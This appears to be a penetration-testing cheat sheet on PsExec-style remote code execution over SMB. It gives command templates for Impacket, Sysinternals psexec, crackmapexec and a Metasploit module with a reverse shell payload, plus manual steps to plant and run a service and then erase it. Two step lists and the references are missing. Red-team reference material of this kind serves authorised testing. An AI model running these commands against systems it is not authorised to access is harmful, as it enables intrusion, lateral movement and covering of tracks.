PsExec (tcp/445)

PsExec is an old trick introduced by Mark Russinovich that allows to perform remote code execution over SMB (tcp/445).


This trick requires to establish an SMB session with the target and is performed through the following steps:

Once the payload has been executed, the following steps are performed to clean:

Because it needs to interact with the Service Control Manager, it requires administrative privileges.


Impacket - psexec.py

psexec.py [DOMAIN/]<USERNAME>[:PASSWORD]@<HOST> [command]

Source: github.com/SecureAuthCorp/impacket/examples/psexec.py

SysInternals - psexec.exe

psexec.exe -nobanner -accepteula \\<HOST> -u [DOMAIN\]<USERNAME> -r [SERVICE NAME] [command]

Source: docs.microsoft.com/en-us/sysinternals/downloads/psexec

Option Description
-d Runs the command detached, i.e. in the background, without any interaction with stdin and stdout
-s Runs the command with local SYSTEM privileges

crackmapexec

crackmapexec <HOST/CIDR> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --exec-method smbexec -x <CMD>

Source: github.com/byt3bl33d3r/CrackMapExec

Metasploit - exploit/windows/smb/psexec

use exploit/windows/smb/psexec
set RHOST <IP ADDRESS>
set SMBUser <USERNAME>
set SMBDomain <DOMAIN>
set SMBPass <PASSWORD>
set payload <meterpreter/reverse shell/cmd>
run -j

Source: github.com/rapid7/metasploit-framework/modules/exploits/windows/smb/psexec.rb

Manual

First, establish an SMB session with the target or start a new command prompt with NETONLY credentials:

net use \\<HOST> /user:[DOMAIN\]<USERNAME>
runas /netonly /user:[DOMAIN\]<USERNAME> cmd.exe

Then, copy the executable file to the target through the SMB session:

copy \path\to\executable \\<HOST>\ADMIN$

Then, create and start the service that will call the executable:

sc.exe \\<HOST> create <SERVICE NAME> binpath= "cmd.exe /k <\path\to\executable>"
sc.exe \\<HOST> start <SERVICE NAME>

Finally, you can clean the service and executable once the payload has been executed:

sc.exe \\<HOST> delete <SERVICE NAME>
del \\<HOST>\path\to\executable

References